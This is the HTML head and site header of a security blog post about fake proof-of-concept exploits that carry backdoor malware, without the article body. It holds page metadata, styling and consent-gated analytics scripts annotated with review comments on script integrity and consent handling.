<!doctype html><html lang="en"><head>
    <meta charset="utf-8">
    <title>New PoC Exploit Found: Fake Proof of Concept with Backdoor Malware</title>
    <link rel="shortcut icon" href="https://www.uptycs.com/hubfs/uptycs_mark_1C_purple_rgb.png">
    <meta name="description" content="Uptycs reveals how newly discovered fake PoC malware includes a backdoor for data theft, offering strategies for detection, recovery &amp; prevention.">


    
    
    
    
    


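    <!-- NOTE(review): third-party SDK that runs with full page privileges and has no integrity pin (the jQuery include on this page carries integrity + crossorigin). The URL is now scheme-pinned to https instead of protocol-relative; if the vendor cannot publish a versioned, hashable file, constrain it with a Content-Security-Policy script-src allowlist. -->
    <script src="https://cdn.bc0a.com/autopilot/f00000000301697/autopilot_sdk.js" async></script>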


    
     

    
    


    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.4/jquery.min.js" integrity="sha512-pumBsjNRGGqkPzKHndZMaAG+bir374sORyzM3uulLV14lN5LyykqNk8eEeUlUkB3U0M4FApyaHraT65ihJhDpQ==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>


    <!--     <link rel="stylesheet" href="../../assets/vendor/aos/dist/aos.css">
    <script src="../../assets/vendor/aos/dist/aos.js"></script> -->

    <script>

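      /*
       * Deferred Google Tag Manager bootstrap.
       *
       * The container script is injected either 3500 ms after DOMContentLoaded
       * or on the first scroll / mousemove / touchstart, whichever comes first.
       *
       * NOTE(review): this path injects the container without consulting the
       * HubSpot privacy-consent listener that gates the hsLoadGtm loader further
       * down this page, and both paths request the same container id
       * (GTM-P663XDQ). Confirm that loading before consent is intended and that
       * the container cannot be injected twice.
       */
      document.addEventListener('DOMContentLoaded', () => {
        // Fallback timer: 3500 milliseconds (3.5 s), adjustable.
        setTimeout(initGTM, 3500);
      });
      document.addEventListener('scroll', initGTMOnEvent);
      document.addEventListener('mousemove', initGTMOnEvent);
      document.addEventListener('touchstart', initGTMOnEvent);

      /**
       * First-interaction handler: starts GTM and then detaches itself.
       * All three interaction listeners are removed at once, so the handler
       * does not keep firing on every later scroll or mouse move.
       */
      function initGTMOnEvent() {
        initGTM();
        ['scroll', 'mousemove', 'touchstart'].forEach((type) => {
          document.removeEventListener(type, initGTMOnEvent);
        });
      }

      /**
       * Injects the GTM container script exactly once.
       *
       * @returns {false|undefined} false when GTM was already initialised,
       *   otherwise undefined after the script element has been appended.
       */
      function initGTM() {
        if (window.gtmDidInit) {
          return false;
        }
        window.gtmDidInit = true; // guard: never append the script twice
        // Make sure the queue exists even if no other snippet created it,
        // so the onload handler below cannot throw a ReferenceError.
        window.dataLayer = window.dataLayer || [];
        const script = document.createElement('script');
        script.async = true;
        // Record the page view as soon as the container has loaded.
        script.onload = () => {
          window.dataLayer.push({ event: 'gtm.js', 'gtm.start': new Date().getTime(), 'gtm.uniqueEventId': 0 });
        };
        script.src = 'https://www.googletagmanager.com/gtm.js?id=GTM-P663XDQ';
        document.head.appendChild(script);
      }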
    </script>    


    <script>
      // Settings object for the HubSpot conversations (chat) widget.
      // disableAttachment: presumably switches off file attachments in the chat, confirm against the widget docs.
      window.hsConversationsSettings = { disableAttachment: true };
    </script>

    
    

    
    <meta name="viewport" content="width=device-width, initial-scale=1">

    
    <meta property="og:description" content="Uptycs reveals how newly discovered fake PoC malware includes a backdoor for data theft, offering strategies for detection, recovery &amp; prevention.">
    <meta property="og:title" content="New PoC Exploit Found: Fake Proof of Concept with Backdoor Malware">
    <meta name="twitter:description" content="Uptycs reveals how newly discovered fake PoC malware includes a backdoor for data theft, offering strategies for detection, recovery &amp; prevention.">
    <meta name="twitter:title" content="New PoC Exploit Found: Fake Proof of Concept with Backdoor Malware">

    

    
    <style>
a.cta_button{-moz-box-sizing:content-box !important;-webkit-box-sizing:content-box !important;box-sizing:content-box !important;vertical-align:middle}.hs-breadcrumb-menu{list-style-type:none;margin:0px 0px 0px 0px;padding:0px 0px 0px 0px}.hs-breadcrumb-menu-item{float:left;padding:10px 0px 10px 10px}.hs-breadcrumb-menu-divider:before{content:'›';padding-left:10px}.hs-featured-image-link{border:0}.hs-featured-image{float:right;margin:0 0 20px 20px;max-width:50%}@media (max-width: 568px){.hs-featured-image{float:none;margin:0;width:100%;max-width:100%}}.hs-screen-reader-text{clip:rect(1px, 1px, 1px, 1px);height:1px;overflow:hidden;position:absolute !important;width:1px}
</style>

<link rel="stylesheet" href="https://www.uptycs.com/hs-fs/hub/2617658/hub_generated/template_assets/105237096759/1725517696790/Uptycs_Theme_2023/css/main.css" defer="true">
<link rel="stylesheet" href="https://www.uptycs.com/hs-fs/hub/2617658/hub_generated/template_assets/169638321455/1727778691677/Uptycs_Theme_2023/css/templates/blog-new.css" defer="true">
<link rel="stylesheet" href="https://www.uptycs.com/hs-fs/hub/2617658/hub_generated/template_assets/105237648739/1725517692872/Uptycs_Theme_2023/css/theme-overrides.min.css" defer="true">
<link rel="stylesheet" href="https://www.uptycs.com/hs-fs/hub/2617658/hub_generated/template_assets/118532473678/1725517692765/Uptycs_Theme_2023/css/uptycs-custome-style.min.css" defer="true">
<link rel="stylesheet" href="https://www.uptycs.com/hs-fs/hub/2617658/hub_generated/template_assets/148558324100/1725517698477/Uptycs_Theme_2023/css/aos/aos.min.css" defer="true">
<link rel="stylesheet" href="https://www.uptycs.com/hs-fs/hub/2617658/hub_generated/template_assets/169533052438/1725517841480/Uptycs_Theme_2023/css/components/_header-new.min.css">
<link rel="stylesheet" href="https://www.uptycs.com/hs-fs/hub/2617658/hub_generated/module_assets/169053681686/1726032338890/module_169053681686_top-banner.min.css">

<style>
  .UT_announcement_bar.widget_1726026662100 {
    padding-top: 10px;
padding-right: 0px;
padding-bottom: 10px;
padding-left: 0px;

    background: linear-gradient(to right, rgba(146, 101, 235, 1), rgba(146, 232, 251, 1), rgba(146, 232, 251, 1), rgba(210, 255, 82, 1)); 
  }
  .UT_announcement_bar.widget_1726026662100 .UT_announcement_bar-inner {
    padding: 0px 40px;
  }
  .UT_announcement_bar.widget_1726026662100 a.cta_button span {
    font-size: 13px !important;
  }
  .UT_announcement_bar.widget_1726026662100 a.cta_button {
    padding: 0px 1px !important;
    font-size: 13px !important;
    background: transparent !important;
    color: #050314 !important;
    border-bottom: 2px solid #050314 !important;
    border-radius: 0px !important;
    font-weight: 600;
    line-height: 16px !important; 
    font-family: Dazzed !important;
  }
  .UT_announcement_bar.widget_1726026662100 a.cta_button span {
    color: #050314 !important;
  } 
  .UT_announcement_bar.widget_1726026662100 a.cta_button:hover {
    color: #050314 !important;
    border-bottom: 2px solid #050314 !important;
  }
  .UT_announcement_bar a.cta_button:before {
    background: #050314;
  }
  .UT_announcement_bar.widget_1726026662100 .banner-header{
    color: #050314;
    font-size: 13px;
    font-style: normal;
    font-weight: 500;
    line-height: 16px;
  }
  .UT_announcement_bar.widget_1726026662100 {
    position: fixed;
    width: 100%;
    left: 0;
    top: -100%;
    -webkit-transition: all 0.8s ease-in-out;
    transition: all 0.8s ease-in-out;
    z-index: 99999999999;
  }
  .UT_announcement_bar.widget_1726026662100.show-pop {
    top: 0;
    left: 0;
    -webkit-transition: all 0.3s ease-in-out;
    transition: all 0.3s ease-in-out;
  }
  @media only screen and (max-width: 767px){
    .UT_announcement_bar.widget_1726026662100 {
      position: fixed !important;
    }
    .UT_announcement_bar.widget_1726026662100.show-pop { 
      -webkit-transition: all 0.3s ease-in-out;
      transition: all 0.3s ease-in-out;
    }
  }
  body.body-show-pop {
    margin-top: 45.2px;
    -webkit-transition: all 0.3s ease-in-out;
    transition: all 0.3s ease-in-out;
  }
  body.body-show-pop .HeaderTop {
    margin-top: 28.2px;
    -webkit-transition: all 0.3s ease-in-out;
    transition: all 0.3s ease-in-out;
  }  
  body.body-show-pop .header-new.show-pop {
  -webkit-transition: all 0.4s ease-in-out;
    transition: all 0.4s ease-in-out;
  }
  

  /**************iPad Portrait***************/
  @media only screen and ( max-width: 1024px ) and (min-width: 986px){
    .UT_announcement_bar .banner-cta {
      min-width: 120px;
    }
  }
  /********************************************//**************iPad Portrait***************/
  @media only screen and (max-width: 985px) and (min-width: 768px){
    body.body-show-pop {
      margin-top: 45px !important;
    }
    body.body-show-pop .HeaderTop { 
      margin-top: 45px !important;
    } 
    .UT_announcement_bar .banner-cta {
      min-width: 120px;
    }

  }
  /********************************************//**************iPad Portrait***************/
  @media only screen and (max-width: 479px) and (min-width: 220px){
    .UT_announcement_bar .UT_announcement_bar-inner {
      padding: 0px 20px !important;
    }
    body.body-show-pop {
      margin-top: 90px !important;
    }
    body.body-show-pop .HeaderTop { 
      margin-top: 90px !important;
    } 

  }
  /**********************************//***************iPhone Landscape*************/
  @media only screen and (max-width: 767px) and (min-width: 480px){
    body.body-show-pop {
      margin-top: 80px !important;
    }
    body.body-show-pop header.header.menu_header {
      margin-top: 80px;
    } 
    .UT_announcement_bar .cta-banner{ 
      flex-direction: row;
      text-align: center;
    }
    .UT_announcement_bar .banner-header {
      text-align: left;
    }
    .UT_announcement_bar .banner-header {
      margin-bottom: 0px;   
    }

  }

  
  @media only screen and (max-width: 800px) and (min-width: 120px){
    .UT_announcement_bar{
      display: none !important
    }
    

</style>

<link rel="stylesheet" href="https://www.uptycs.com/hs-fs/hub/2617658/hub_generated/module_assets/177030409118/1730182624853/module_177030409118_mega-menu-new.min.css">

<style>
  #hs_cos_wrapper_mega-menu-new .menu .menu__submenu { background-color:rgba(255,255,255,1.0); }

@media (min-width:767px) {
  #hs_cos_wrapper_mega-menu-new .menu__submenu--level-2>.menu__item:first-child:before { background-color:rgba(255,255,255,1.0); }
}

#hs_cos_wrapper_mega-menu-new .menu__submenu .menu__link,
#hs_cos_wrapper_mega-menu-new .menu__submenu .menu__link:hover,
#hs_cos_wrapper_mega-menu-new .menu__submenu .menu__link:focus { background-color:rgba(255,255,255,1.0); }

#hs_cos_wrapper_mega-menu-new .menu__submenu .menu__child-toggle-icon,
#hs_cos_wrapper_mega-menu-new .menu__submenu .menu__child-toggle-icon:hover,
#hs_cos_wrapper_mega-menu-new .menu__submenu .menu__child-toggle-icon:focus {}

</style>


<style>

  .menu--desktop .menu__item--depth-1 .menu__link {
    position: relative;
    display: inline-block;
  }

  .menu--desktop .menu__item--depth-1 .menu__link::after {
    content: '';
    position: absolute;
    bottom: -4px;
    left: 50%;
    height: 3px;
    width: 0;
    background: linear-gradient(90deg, #6910D9 0%, #8AC1F5 51.5%, #BAF473 100%);
    transition: width 0.2s ease, left 0.2s ease;
    transform: translateX(-50%);
  }

  .menu--desktop .menu__item--depth-1 .menu__link:hover::after,
  .menu--desktop .menu__item--depth-1 .menu__link:active::after {
    width: 100%;
    left: 50%;
    transform: translateX(-50%);
  }



  .menu--desktop li.menu__item.menu__item--depth-2 a.menu__link.menu__link--toggle::after{
    content:none;
  }
  /*   .menu--desktop li.menu__item.menu__item--depth-3 a.menu__link.menu__link--toggle::after{
  content:none;
  } */
  .menu--desktop li.menu__item.menu__item--depth-2 a.menu__link.menu__link--toggle::before {
    content: "";
    display: block;
    height:1px;
    width: 82%;
    background-color:#0000002B;
    position: absolute;
    bottom: 0;
    left: 27px;
  }  
  /*   .menu--desktop li.menu__item.menu__item--depth-3 span.menu__link::after{
  content:none;
  } */

  .menu--desktop ul.menu__submenu li.menu__item.menu__item--depth-3 a.menu__link{

  }

  .menu__submenu .menu__item--depth-3 .menu__link:hover:after {
    /* Styles for the link when hovered */
    background-image: url('data:image/svg+xml,%3Csvg width="14" height="14" viewBox="0 0 14 14" fill="none" xmlns="http://www.w3.org/2000/svg"%3E%3Cpath fill-rule="evenodd" clip-rule="evenodd" d="M11.7094 7.35358L1 7.35358V6.35358L11.7095 6.35358L7.06299 1.70711L7.77009 1L13.6236 6.85355L7.77009 12.7071L7.06299 12L11.7094 7.35358Z" fill="%23050314"/%3E%3Cpath d="M11.7094 7.35358L11.8862 7.53035L12.313 7.10358H11.7094V7.35358ZM1 7.35358H0.75V7.60358H1L1 7.35358ZM1 6.35358L1 6.10358H0.75V6.35358H1ZM11.7095 6.35358V6.60358H12.313L11.8862 6.1768L11.7095 6.35358ZM7.06299 1.70711L6.88621 1.53033L6.70943 1.70711L6.88621 1.88388L7.06299 1.70711ZM7.77009 1L7.94687 0.823223L7.77009 0.646447L7.59332 0.823223L7.77009 1ZM13.6236 6.85355L13.8004 7.03033L13.9772 6.85355L13.8004 6.67678L13.6236 6.85355ZM7.77009 12.7071L7.59332 12.8839L7.77009 13.0607L7.94687 12.8839L7.77009 12.7071ZM7.06299 12L6.88621 11.8232L6.70943 12L6.88621 12.1768L7.06299 12ZM11.7094 7.10358L1 7.10358L1 7.60358L11.7094 7.60358V7.10358ZM1.25 7.35358V6.35358H0.75V7.35358H1.25ZM1 6.60358L11.7095 6.60358V6.10358L1 6.10358L1 6.60358ZM11.8862 6.1768L7.23977 1.53033L6.88621 1.88388L11.5327 6.53035L11.8862 6.1768ZM7.23977 1.88388L7.94687 1.17678L7.59332 0.823223L6.88621 1.53033L7.23977 1.88388ZM7.59332 1.17678L13.4469 7.03033L13.8004 6.67678L7.94687 0.823223L7.59332 1.17678ZM13.4469 6.67678L7.59332 12.5303L7.94687 12.8839L13.8004 7.03033L13.4469 6.67678ZM7.94687 12.5303L7.23977 11.8232L6.88621 12.1768L7.59332 12.8839L7.94687 12.5303ZM7.23977 12.1768L11.8862 7.53035L11.5326 7.1768L6.88621 11.8232L7.23977 12.1768Z" fill="%236910D9"/%3E%3C/svg%3E');;
    background-size: cover;
    background-position: center; 
    background-repeat: no-repeat; 
    width: 12.624px;
    height: 11.707px;
    position:absolute;
    left: 90%; 
    top: 50%;
    transform: translateY(-50%);
    opacity:1;
  }
  .menu__submenu .menu__item--depth-3 .menu__link:after {
    /* Styles for the link when hovered */
    background-image: url('data:image/svg+xml,%3Csvg width="14" height="14" viewBox="0 0 14 14" fill="none" xmlns="http://www.w3.org/2000/svg"%3E%3Cpath fill-rule="evenodd" clip-rule="evenodd" d="M11.7094 7.35358L1 7.35358V6.35358L11.7095 6.35358L7.06299 1.70711L7.77009 1L13.6236 6.85355L7.77009 12.7071L7.06299 12L11.7094 7.35358Z" fill="%23050314"/%3E%3Cpath d="M11.7094 7.35358L11.8862 7.53035L12.313 7.10358H11.7094V7.35358ZM1 7.35358H0.75V7.60358H1L1 7.35358ZM1 6.35358L1 6.10358H0.75V6.35358H1ZM11.7095 6.35358V6.60358H12.313L11.8862 6.1768L11.7095 6.35358ZM7.06299 1.70711L6.88621 1.53033L6.70943 1.70711L6.88621 1.88388L7.06299 1.70711ZM7.77009 1L7.94687 0.823223L7.77009 0.646447L7.59332 0.823223L7.77009 1ZM13.6236 6.85355L13.8004 7.03033L13.9772 6.85355L13.8004 6.67678L13.6236 6.85355ZM7.77009 12.7071L7.59332 12.8839L7.77009 13.0607L7.94687 12.8839L7.77009 12.7071ZM7.06299 12L6.88621 11.8232L6.70943 12L6.88621 12.1768L7.06299 12ZM11.7094 7.10358L1 7.10358L1 7.60358L11.7094 7.60358V7.10358ZM1.25 7.35358V6.35358H0.75V7.35358H1.25ZM1 6.60358L11.7095 6.60358V6.10358L1 6.10358L1 6.60358ZM11.8862 6.1768L7.23977 1.53033L6.88621 1.88388L11.5327 6.53035L11.8862 6.1768ZM7.23977 1.88388L7.94687 1.17678L7.59332 0.823223L6.88621 1.53033L7.23977 1.88388ZM7.59332 1.17678L13.4469 7.03033L13.8004 6.67678L7.94687 0.823223L7.59332 1.17678ZM13.4469 6.67678L7.59332 12.5303L7.94687 12.8839L13.8004 7.03033L13.4469 6.67678ZM7.94687 12.5303L7.23977 11.8232L6.88621 12.1768L7.59332 12.8839L7.94687 12.5303ZM7.23977 12.1768L11.8862 7.53035L11.5326 7.1768L6.88621 11.8232L7.23977 12.1768Z" fill="%236910D9"/%3E%3C/svg%3E');;
    background-size: cover;
    background-position: center; 
    background-repeat: no-repeat; 
    width: 12.624px;
    height: 11.707px;
    position:absolute;
    left: 85%; 
    top: 50%;
    transform: translateY(-50%);
    opacity:0;
  }
  .menu__submenu .menu__item--depth-3 .menu__link {
    transition: width 0.2s ease, left 0.2s ease;
  }
  .menu__submenu .menu__item--depth-3 .menu__link{
    position:relative;
    /*     display: flex;
    align-items: center; 
    padding-right: 20px;  */
  }
</style>

<link rel="stylesheet" href="https://www.uptycs.com/hs-fs/hub/2617658/hub_generated/module_assets/169623459881/1725336440608/module_169623459881_header-cta.min.css">

<style>
.header-cta-outer .demo-cta a:hover{
  background-color: #9de70a;
  border: 1px solid #9de70a;
  }
  .header-cta-outer .log-cta a:hover{
  color:#5c5b5f
  }
</style>

<link rel="stylesheet" href="https://www.uptycs.com/hs-fs/hub/2617658/hub_generated/module_assets/169635189857/1733456835608/module_169635189857_blog-article-header.min.css">

<style>
  .blog-poster-header .post-tags-mobile::before{
    content:url("");
    background-image:url(https://www.uptycs.com/hubfs/Vector%202.svg);
    background-position:center; 
    background-size: auto;
    background-repeat: no-repeat;
    width:2px;
    height:18px;
    position: absolute;
    top: 12px;
    left: -12px;
  }
</style>

<link rel="stylesheet" href="https://www.uptycs.com/hs-fs/hub/2617658/hub_generated/module_assets/170041160857/1725516579135/module_170041160857_sidebar-popup-cta.min.css">

<style>
  @media only screen and (max-width: 767px) and (min-width: 220px){
    .report-popup-section .actions::before{
      right: 90px;
    }

  }
</style>

<link rel="stylesheet" href="https://www.uptycs.com/hs-fs/hub/2617658/hub_generated/module_assets/169940550668/1733491051049/module_169940550668_table-of-content.min.css">
<link rel="stylesheet" href="https://www.uptycs.com/hs-fs/hub/2617658/hub_generated/module_assets/174733485380/1729060694808/module_174733485380_Footer_New_2024.min.css">

<style>
  #hs_cos_wrapper_widget_1722594192479 .TwoMenuLinks {
  padding-right:22px;
  width:17%;
}

#hs_cos_wrapper_widget_1722594192479 .Footer_Links { width:75%; }

#hs_cos_wrapper_widget_1722594192479 .Footer {
  display:inline-block;
  width:100%;
}

#hs_cos_wrapper_widget_1722594192479 .Attack_Surfaces h6 {
  margin-bottom:8px;
  margin-top:20px;
  color:#9b54f8;
}

#hs_cos_wrapper_widget_1722594192479 .footer_pre_copy {
  margin-bottom:0;
  padding-top:0;
  text-align:left !important;
  width:24.1%;
}

#hs_cos_wrapper_widget_1722594192479 .footer_icons_new { margin:10px 0; }

#hs_cos_wrapper_widget_1722594192479 .mobile_parter { display:none; }

@media all and (max-width:1024px) {
  #hs_cos_wrapper_widget_1722594192479 .TwoMenuLinks {
    padding-right:35px;
    width:45%;
    display:block;
  }

  #hs_cos_wrapper_widget_1722594192479 .FServices_Links {
    padding-left:0;
    padding-right:25px;
    width:100%;
  }

  #hs_cos_wrapper_widget_1722594192479 .Attack_Surfaces,
  #hs_cos_wrapper_widget_1722594192479 .Use_Case { width:100%; }

  #hs_cos_wrapper_widget_1722594192479 footer.footer.footer_new .Footer_SocialMedia { padding-bottom:0px; }
}

@media all and (max-width:767px) {
  #hs_cos_wrapper_widget_1722594192479 .footer_pre_copy { width:100%; }

  #hs_cos_wrapper_widget_1722594192479 .Footer_Links { width:100%; }

  #hs_cos_wrapper_widget_1722594192479 .footer_icons_new {
    height:50px !important;
    width:auto;
  }

  #hs_cos_wrapper_widget_1722594192479 .Footer_SocialMedia {
    float:left;
    width:100%;
  }

  #hs_cos_wrapper_widget_1722594192479 .footer_pre_copy { display:none; }

  #hs_cos_wrapper_widget_1722594192479 .footer_pre_copy.mobile_parter { display:block !important; }

  #hs_cos_wrapper_widget_1722594192479 .TwoMenuLinks {
    padding-right:25px;
    width:45%;
  }
}

@media all and (max-width:640px) {
  #hs_cos_wrapper_widget_1722594192479 .TwoMenuLinks {
    padding-right:0px;
    display:block;
    margin-top:0;
  }

  #hs_cos_wrapper_widget_1722594192479 .Attack_Surfaces h6 {
    margin-bottom:7px;
    font-size:14px;
  }

  #hs_cos_wrapper_widget_1722594192479 .FPartners_Links,
  #hs_cos_wrapper_widget_1722594192479 .FServices_Links {
    margin-top:0;
    padding-top:0;
  }

  #hs_cos_wrapper_widget_1722594192479 .Footer_Links ul li { padding:0 0 5px; }

  #hs_cos_wrapper_widget_1722594192479 .Footer_Links ul li a { font-size:12px; }

  #hs_cos_wrapper_widget_1722594192479 .Footer h5 { margin-bottom:10px; }

  #hs_cos_wrapper_widget_1722594192479 .TwoMenuLinks {
    padding-right:25px;
    width:45%;
  }
}

</style>

<style>
</style>

<!-- Editor Styles -->
<style id="hs_editor_style" type="text/css">
.header-top-row-0-force-full-width-section > .row-fluid {
  max-width: none !important;
}
/* HubSpot Styles (default) */
.header-top-row-0-padding {
  padding-top: 0px !important;
  padding-bottom: 0px !important;
}
</style>
    <script type="application/ld+json">
{
  "mainEntityOfPage" : {
    "@type" : "WebPage",
    "@id" : "https://www.uptycs.com/blog/threat-research-report-team/new-poc-exploit-backdoor-malware"
  },
  "author" : {
    "name" : "Uptycs Threat Research",
    "url" : "https://www.uptycs.com/blog/threat-research-report-team/author/uptycs-threat-research",
    "@type" : "Person"
  },
  "headline" : "New PoC Exploit Found: Fake Proof of Concept with Backdoor Malware",
  "datePublished" : "2023-07-12T12:00:00.000Z",
  "dateModified" : "2024-08-14T10:20:42.104Z",
  "publisher" : {
    "name" : "Uptycs",
    "logo" : {
      "url" : "https://2617658.fs1.hubspotusercontent-na1.net/hubfs/2617658/Uptycs%20Logos%202022/uptycs_logo_2C_on-light_rgb.png",
      "@type" : "ImageObject"
    },
    "@type" : "Organization"
  },
  "@context" : "https://schema.org",
  "@type" : "BlogPosting",
  "image" : [ "https://www.uptycs.com/hubfs/POC%20door.jpg" ]
}
</script>


    
<!--  Added by GoogleAnalytics integration -->
<script>
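var _hsp = window._hsp = window._hsp || [];
// Universal Analytics is loaded only from inside the HubSpot consent listener,
// i.e. after the visitor allowed everything or at least the analytics category.
_hsp.push(['addPrivacyConsentListener', function(consent) {
  if (!(consent.allowed || (consent.categories && consent.categories.analytics))) {
    return; // no analytics consent: do not inject analytics.js
  }
  // Standard analytics.js bootstrap: defines the ga() command queue and inserts
  // the script before the first <script> element. The URL is pinned to https
  // (it was protocol-relative) so the tag can never be fetched over plain http.
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
  ga('create','UA-117543321-1','auto');
  ga('send','pageview');
}]);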
</script>

<!-- /Added by GoogleAnalytics integration -->

<!--  Added by GoogleAnalytics4 integration -->
<script>
// Command queues shared with the HubSpot privacy API and the Google tag.
window._hsp = window._hsp || [];
var _hsp = window._hsp;
window.dataLayer = window.dataLayer || [];

// gtag() queues its raw arguments object on the data layer.
function gtag() {
  dataLayer.push(arguments);
}

var useGoogleConsentModeV2 = true;
var waitForUpdateMillis = 1000;

// Consent defaults are registered once per page, before the config call below.
if (!window._hsGoogleConsentRunOnce) {
  window._hsGoogleConsentRunOnce = true;

  // Every storage and ads signal starts out denied.
  gtag('consent', 'default', {
    'ad_storage': 'denied',
    'analytics_storage': 'denied',
    'ad_user_data': 'denied',
    'ad_personalization': 'denied',
    'wait_for_update': waitForUpdateMillis
  });

  if (!useGoogleConsentModeV2) {
    // Legacy path: translate the HubSpot consent object into a consent update.
    _hsp.push(['addPrivacyConsentListener', function (consent) {
      var categories = (consent && consent.categories) || {};
      var blanket = Boolean(consent && consent.allowed);
      var analyticsState = (blanket || categories.analytics) ? 'granted' : 'denied';
      var adsState = (blanket || categories.advertisement) ? 'granted' : 'denied';

      gtag('consent', 'update', {
        'ad_storage': adsState,
        'analytics_storage': analyticsState,
        'ad_user_data': adsState,
        'ad_personalization': adsState
      });
    }]);
  } else {
    // Consent Mode v2: hand consent updates over to the HubSpot privacy API.
    _hsp.push(['useGoogleConsentModeV2'])
  }
}

gtag('js', new Date());
gtag('set', 'developer_id.dZTQ1Zm', true);
gtag('config', 'G-FM1R8N7KP8');
</script>
<script async src="https://www.googletagmanager.com/gtag/js?id=G-FM1R8N7KP8"></script>

<!-- /Added by GoogleAnalytics4 integration -->

<!--  Added by GoogleTagManager integration -->
<script>
// Consent-gated Google Tag Manager loader (HubSpot integration snippet).
// Re-declares the shared queues and the gtag() helper so the snippet works on its own.
var _hsp = window._hsp = window._hsp || [];
window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}

var useGoogleConsentModeV2 = true;
var waitForUpdateMillis = 1000;



// Injects the GTM container GTM-P663XDQ at most once per page.
// NOTE(review): the deferred initGTM() loader near the top of this page injects
// the same container id without going through the consent listener below.
// Confirm which of the two paths is meant to be authoritative.
var hsLoadGtm = function loadGtm() {
    // Already loaded through this path: nothing to do.
    if(window._hsGtmLoadOnce) {
      return;
    }

    if (useGoogleConsentModeV2) {

      gtag('set','developer_id.dZTQ1Zm',true);

      // All consent signals default to denied before the container is requested.
      gtag('consent', 'default', {
      'ad_storage': 'denied',
      'analytics_storage': 'denied',
      'ad_user_data': 'denied',
      'ad_personalization': 'denied',
      'wait_for_update': waitForUpdateMillis
      });

      _hsp.push(['useGoogleConsentModeV2'])
    }

    // GTM bootstrap: pushes the gtm.start event and inserts gtm.js (over https)
    // before the first <script> element in the document.
    (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
    new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
    j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
    'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
    })(window,document,'script','dataLayer','GTM-P663XDQ');

    // The once-flag is set only after the script element has been inserted.
    window._hsGtmLoadOnce = true;
};

// Load GTM only when the visitor allowed everything or the analytics category.
_hsp.push(['addPrivacyConsentListener', function(consent){
  if(consent.allowed || (consent.categories && consent.categories.analytics)){
    hsLoadGtm();
  }
}]);

</script>

<!-- /Added by GoogleTagManager integration -->



<link rel="amphtml" href="https://www.uptycs.com/blog/threat-research-report-team/new-poc-exploit-backdoor-malware?hs_amp=true">

<meta property="og:image" content="https://www.uptycs.com/hubfs/POC%20door.jpg">
<meta property="og:image:width" content="1200">
<meta property="og:image:height" content="627">
<meta property="og:image:alt" content="Read the blog from Uptycs Threat Research team about fake PoC malware with a backdoor allowing data theft.">
<meta name="twitter:image" content="https://www.uptycs.com/hubfs/POC%20door.jpg">
<meta name="twitter:image:alt" content="Read the blog from Uptycs Threat Research team about fake PoC malware with a backdoor allowing data theft.">

<meta property="og:url" content="https://www.uptycs.com/blog/threat-research-report-team/new-poc-exploit-backdoor-malware">
<meta name="twitter:card" content="summary_large_image">

<link rel="canonical" href="https://www.uptycs.com/blog/threat-research-report-team/new-poc-exploit-backdoor-malware">

<meta property="og:type" content="article">
<link rel="alternate" type="application/rss+xml" href="https://www.uptycs.com/blog/threat-research-report-team/rss.xml">
<meta name="twitter:domain" content="www.uptycs.com">
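<!-- NOTE(review): third-party widget script with no integrity pin; the URL is scheme-pinned to https instead of protocol-relative. The element body is left as it was. -->
<script src="https://platform.linkedin.com/in.js">
    lang: en_US
</script>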

<meta http-equiv="content-language" content="en">






    

  <meta name="generator" content="HubSpot"></head>

  <body class="  hs-content-id-124199424638 hs-blog-post hs-blog-id-174984884320 light-background">
<!--  Added by GoogleTagManager integration -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-P663XDQ" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>

<!-- /Added by GoogleTagManager integration -->

    <div class="body-wrapper   hs-content-id-124199424638 hs-blog-post hs-blog-id-174984884320">
      
      


      <div data-global-resource-path="Uptycs_Theme_2023/templates/partials/mega-menu-new.html">


<header class="header header-new ">
  <div class="HeaderTop text-center"><div class="wrapper"></div></div>
  <div class="header-inner wrapper">
    
    <a href="#main-content" class="header__skip">Skip to content</a>

    

    <div class="container-fluid content-wrapper">
<div class="row-fluid-wrapper">
<div class="row-fluid">
<div class="span12 widget-span widget-type-cell " style="" data-widget-type="cell" data-x="0" data-w="12">

<div class="row-fluid-wrapper row-depth-1 row-number-1 dnd-section header-top-row-0-padding header-top-row-0-force-full-width-section">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-cell dnd-column" style="" data-widget-type="cell" data-x="0" data-w="12">

<div class="row-fluid-wrapper row-depth-1 row-number-2 dnd-row">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-custom_widget dnd-module" style="" data-widget-type="custom_widget" data-x="0" data-w="12">

</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

</div><!--end widget-span -->
</div>
</div>
</div>

    

    <div class="header__container content-wrapper">

      

      <div class="header__logo header__logo--main">
        <div id="hs_cos_wrapper_site_logo" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_module widget-type-logo" style="" data-hs-cos-general-type="widget" data-hs-cos-type="module">
  





  <span id="hs_cos_wrapper_site_logo_hs_logo_widget" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_logo" style="" data-hs-cos-general-type="widget" data-hs-cos-type="logo"><a href="https://www.uptycs.com/" id="hs-link-site_logo_hs_logo_widget" style="border-width:0px;border:0px;"><img src="https://www.uptycs.com/hubfs/uptycs_logo_2C_on-light_rgb-1.svg" class="hs-image-widget " height="36" style="height: auto;width:120px;border-width:0px;border:0px;" width="120" alt="Uptycs" title="Uptycs"></a></span>
</div>
      </div>

      

    </div>

    

    <div class="container-fluid content-wrapper">
<div class="row-fluid-wrapper">
<div class="row-fluid">
<div class="span12 widget-span widget-type-cell " style="" data-widget-type="cell" data-x="0" data-w="12">

</div><!--end widget-span -->
</div>
</div>
</div>
